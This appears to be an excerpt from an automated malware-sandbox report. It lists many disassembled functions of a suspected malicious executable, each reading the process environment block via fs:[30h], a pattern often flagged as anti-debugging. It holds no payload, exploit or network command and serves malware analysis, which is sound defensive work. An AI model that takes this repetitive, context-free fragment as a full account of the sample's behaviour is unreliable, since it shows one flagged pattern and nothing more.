Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B171 mov eax, dword ptr fs:[00000030h]	0_2_7264B171
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B171 mov eax, dword ptr fs:[00000030h]	0_2_7264B171
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B171 mov eax, dword ptr fs:[00000030h]	0_2_7264B171
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701151 mov eax, dword ptr fs:[00000030h]	0_2_72701151
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267214F mov eax, dword ptr fs:[00000030h]	0_2_7267214F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650150 mov eax, dword ptr fs:[00000030h]	0_2_72650150
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650150 mov eax, dword ptr fs:[00000030h]	0_2_72650150
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650150 mov eax, dword ptr fs:[00000030h]	0_2_72650150
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650150 mov eax, dword ptr fs:[00000030h]	0_2_72650150
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650150 mov eax, dword ptr fs:[00000030h]	0_2_72650150
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650150 mov edx, dword ptr fs:[00000030h]	0_2_72650150
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72643158 mov ecx, dword ptr fs:[00000030h]	0_2_72643158
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266D121 mov eax, dword ptr fs:[00000030h]	0_2_7266D121
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268713B mov eax, dword ptr fs:[00000030h]	0_2_7268713B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72644101 mov eax, dword ptr fs:[00000030h]	0_2_72644101
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72644101 mov eax, dword ptr fs:[00000030h]	0_2_72644101
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72644101 mov eax, dword ptr fs:[00000030h]	0_2_72644101
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B101 mov eax, dword ptr fs:[00000030h]	0_2_7264B101
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B101 mov eax, dword ptr fs:[00000030h]	0_2_7264B101
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72653114 mov eax, dword ptr fs:[00000030h]	0_2_72653114
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72677110 mov eax, dword ptr fs:[00000030h]	0_2_72677110
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72677110 mov eax, dword ptr fs:[00000030h]	0_2_72677110
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72677110 mov eax, dword ptr fs:[00000030h]	0_2_72677110
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265F11B mov eax, dword ptr fs:[00000030h]	0_2_7265F11B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265F11B mov eax, dword ptr fs:[00000030h]	0_2_7265F11B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265F11B mov eax, dword ptr fs:[00000030h]	0_2_7265F11B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265F11B mov eax, dword ptr fs:[00000030h]	0_2_7265F11B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265F11B mov eax, dword ptr fs:[00000030h]	0_2_7265F11B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265F11B mov eax, dword ptr fs:[00000030h]	0_2_7265F11B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265F11B mov eax, dword ptr fs:[00000030h]	0_2_7265F11B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726451E0 mov eax, dword ptr fs:[00000030h]	0_2_726451E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726451E0 mov ecx, dword ptr fs:[00000030h]	0_2_726451E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726451E0 mov eax, dword ptr fs:[00000030h]	0_2_726451E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726451E0 mov eax, dword ptr fs:[00000030h]	0_2_726451E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727011D2 mov eax, dword ptr fs:[00000030h]	0_2_727011D2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B1C3 mov eax, dword ptr fs:[00000030h]	0_2_7264B1C3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B1C3 mov eax, dword ptr fs:[00000030h]	0_2_7264B1C3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726841D4 mov eax, dword ptr fs:[00000030h]	0_2_726841D4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726841D4 mov eax, dword ptr fs:[00000030h]	0_2_726841D4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726841D4 mov eax, dword ptr fs:[00000030h]	0_2_726841D4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727181BF mov eax, dword ptr fs:[00000030h]	0_2_727181BF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D1B7 mov eax, dword ptr fs:[00000030h]	0_2_7267D1B7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265B1B0 mov eax, dword ptr fs:[00000030h]	0_2_7265B1B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C7194 mov eax, dword ptr fs:[00000030h]	0_2_726C7194
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C7194 mov eax, dword ptr fs:[00000030h]	0_2_726C7194
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C7194 mov eax, dword ptr fs:[00000030h]	0_2_726C7194
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264E668 mov eax, dword ptr fs:[00000030h]	0_2_7264E668
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267A675 mov eax, dword ptr fs:[00000030h]	0_2_7267A675
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648670 mov eax, dword ptr fs:[00000030h]	0_2_72648670
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264E650 mov eax, dword ptr fs:[00000030h]	0_2_7264E650
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72685651 mov eax, dword ptr fs:[00000030h]	0_2_72685651
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72685651 mov eax, dword ptr fs:[00000030h]	0_2_72685651
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271864B mov eax, dword ptr fs:[00000030h]	0_2_7271864B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72719623 mov eax, dword ptr fs:[00000030h]	0_2_72719623
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642630 mov ecx, dword ptr fs:[00000030h]	0_2_72642630
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642630 mov eax, dword ptr fs:[00000030h]	0_2_72642630
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72662600 mov eax, dword ptr fs:[00000030h]	0_2_72662600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C660A mov eax, dword ptr fs:[00000030h]	0_2_726C660A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C660A mov eax, dword ptr fs:[00000030h]	0_2_726C660A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C660A mov eax, dword ptr fs:[00000030h]	0_2_726C660A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C660A mov eax, dword ptr fs:[00000030h]	0_2_726C660A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72669600 mov eax, dword ptr fs:[00000030h]	0_2_72669600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72669600 mov eax, dword ptr fs:[00000030h]	0_2_72669600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72669600 mov eax, dword ptr fs:[00000030h]	0_2_72669600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72669600 mov eax, dword ptr fs:[00000030h]	0_2_72669600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72669600 mov eax, dword ptr fs:[00000030h]	0_2_72669600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72669600 mov eax, dword ptr fs:[00000030h]	0_2_72669600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72669600 mov eax, dword ptr fs:[00000030h]	0_2_72669600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265660D mov eax, dword ptr fs:[00000030h]	0_2_7265660D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264A60B mov eax, dword ptr fs:[00000030h]	0_2_7264A60B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264A60B mov eax, dword ptr fs:[00000030h]	0_2_7264A60B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72672616 mov eax, dword ptr fs:[00000030h]	0_2_72672616
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701606 mov eax, dword ptr fs:[00000030h]	0_2_72701606
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A61E mov eax, dword ptr fs:[00000030h]	0_2_7265A61E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A61E mov eax, dword ptr fs:[00000030h]	0_2_7265A61E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726716E5 mov eax, dword ptr fs:[00000030h]	0_2_726716E5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726716E5 mov eax, dword ptr fs:[00000030h]	0_2_726716E5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726EC6F4 mov eax, dword ptr fs:[00000030h]	0_2_726EC6F4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C66F0 mov eax, dword ptr fs:[00000030h]	0_2_726C66F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C66F0 mov eax, dword ptr fs:[00000030h]	0_2_726C66F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C66F0 mov eax, dword ptr fs:[00000030h]	0_2_726C66F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726716C5 mov eax, dword ptr fs:[00000030h]	0_2_726716C5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726716C5 mov eax, dword ptr fs:[00000030h]	0_2_726716C5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726716C5 mov eax, dword ptr fs:[00000030h]	0_2_726716C5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726716C5 mov eax, dword ptr fs:[00000030h]	0_2_726716C5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264A6D7 mov eax, dword ptr fs:[00000030h]	0_2_7264A6D7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726866D0 mov eax, dword ptr fs:[00000030h]	0_2_726866D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264E6A5 mov eax, dword ptr fs:[00000030h]	0_2_7264E6A5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726766B4 mov eax, dword ptr fs:[00000030h]	0_2_726766B4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727186A9 mov eax, dword ptr fs:[00000030h]	0_2_727186A9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72655680 mov eax, dword ptr fs:[00000030h]	0_2_72655680
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72655680 mov eax, dword ptr fs:[00000030h]	0_2_72655680
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72655680 mov eax, dword ptr fs:[00000030h]	0_2_72655680
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72655680 mov eax, dword ptr fs:[00000030h]	0_2_72655680
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72656682 mov eax, dword ptr fs:[00000030h]	0_2_72656682
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271969E mov eax, dword ptr fs:[00000030h]	0_2_7271969E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72680761 mov eax, dword ptr fs:[00000030h]	0_2_72680761
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72675744 mov eax, dword ptr fs:[00000030h]	0_2_72675744
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72675744 mov eax, dword ptr fs:[00000030h]	0_2_72675744
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F8747 mov eax, dword ptr fs:[00000030h]	0_2_726F8747
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C74A mov eax, dword ptr fs:[00000030h]	0_2_7266C74A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C74A mov eax, dword ptr fs:[00000030h]	0_2_7266C74A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F3740 mov eax, dword ptr fs:[00000030h]	0_2_726F3740
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72682758 mov eax, dword ptr fs:[00000030h]	0_2_72682758
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72714747 mov eax, dword ptr fs:[00000030h]	0_2_72714747
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FF752 mov eax, dword ptr fs:[00000030h]	0_2_726FF752
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648730 mov eax, dword ptr fs:[00000030h]	0_2_72648730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648730 mov eax, dword ptr fs:[00000030h]	0_2_72648730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648730 mov eax, dword ptr fs:[00000030h]	0_2_72648730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648730 mov ecx, dword ptr fs:[00000030h]	0_2_72648730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648730 mov eax, dword ptr fs:[00000030h]	0_2_72648730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648730 mov eax, dword ptr fs:[00000030h]	0_2_72648730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648730 mov eax, dword ptr fs:[00000030h]	0_2_72648730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648730 mov eax, dword ptr fs:[00000030h]	0_2_72648730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648730 mov eax, dword ptr fs:[00000030h]	0_2_72648730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648730 mov eax, dword ptr fs:[00000030h]	0_2_72648730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72646700 mov eax, dword ptr fs:[00000030h]	0_2_72646700
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72646700 mov eax, dword ptr fs:[00000030h]	0_2_72646700
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72646700 mov eax, dword ptr fs:[00000030h]	0_2_72646700
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72672700 mov edi, dword ptr fs:[00000030h]	0_2_72672700
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271870A mov eax, dword ptr fs:[00000030h]	0_2_7271870A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726577ED mov eax, dword ptr fs:[00000030h]	0_2_726577ED
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264E7F3 mov eax, dword ptr fs:[00000030h]	0_2_7264E7F3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726747FD mov esi, dword ptr fs:[00000030h]	0_2_726747FD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726747FD mov eax, dword ptr fs:[00000030h]	0_2_726747FD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726747FD mov eax, dword ptr fs:[00000030h]	0_2_726747FD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727187ED mov eax, dword ptr fs:[00000030h]	0_2_727187ED
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F87F1 mov eax, dword ptr fs:[00000030h]	0_2_726F87F1
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726467D0 mov eax, dword ptr fs:[00000030h]	0_2_726467D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726467D0 mov eax, dword ptr fs:[00000030h]	0_2_726467D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726467D0 mov eax, dword ptr fs:[00000030h]	0_2_726467D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726847DE mov eax, dword ptr fs:[00000030h]	0_2_726847DE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FF7D3 mov eax, dword ptr fs:[00000030h]	0_2_726FF7D3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D37D3 mov ecx, dword ptr fs:[00000030h]	0_2_726D37D3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D37D3 mov eax, dword ptr fs:[00000030h]	0_2_726D37D3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D37D3 mov eax, dword ptr fs:[00000030h]	0_2_726D37D3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726897A2 mov eax, dword ptr fs:[00000030h]	0_2_726897A2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726897A2 mov eax, dword ptr fs:[00000030h]	0_2_726897A2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266A7B6 mov eax, dword ptr fs:[00000030h]	0_2_7266A7B6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72702782 mov eax, dword ptr fs:[00000030h]	0_2_72702782
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72702782 mov eax, dword ptr fs:[00000030h]	0_2_72702782
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72702782 mov eax, dword ptr fs:[00000030h]	0_2_72702782
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72702782 mov eax, dword ptr fs:[00000030h]	0_2_72702782
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72702782 mov eax, dword ptr fs:[00000030h]	0_2_72702782
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72702782 mov eax, dword ptr fs:[00000030h]	0_2_72702782
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72702782 mov eax, dword ptr fs:[00000030h]	0_2_72702782
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov ecx, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov ecx, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov ecx, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov ecx, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 mov eax, dword ptr fs:[00000030h]	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C790 mov eax, dword ptr fs:[00000030h]	0_2_7266C790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C790 mov eax, dword ptr fs:[00000030h]	0_2_7266C790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266E79A mov eax, dword ptr fs:[00000030h]	0_2_7266E79A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271878F mov eax, dword ptr fs:[00000030h]	0_2_7271878F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726CE460 mov eax, dword ptr fs:[00000030h]	0_2_726CE460
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264646B mov eax, dword ptr fs:[00000030h]	0_2_7264646B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264646B mov eax, dword ptr fs:[00000030h]	0_2_7264646B
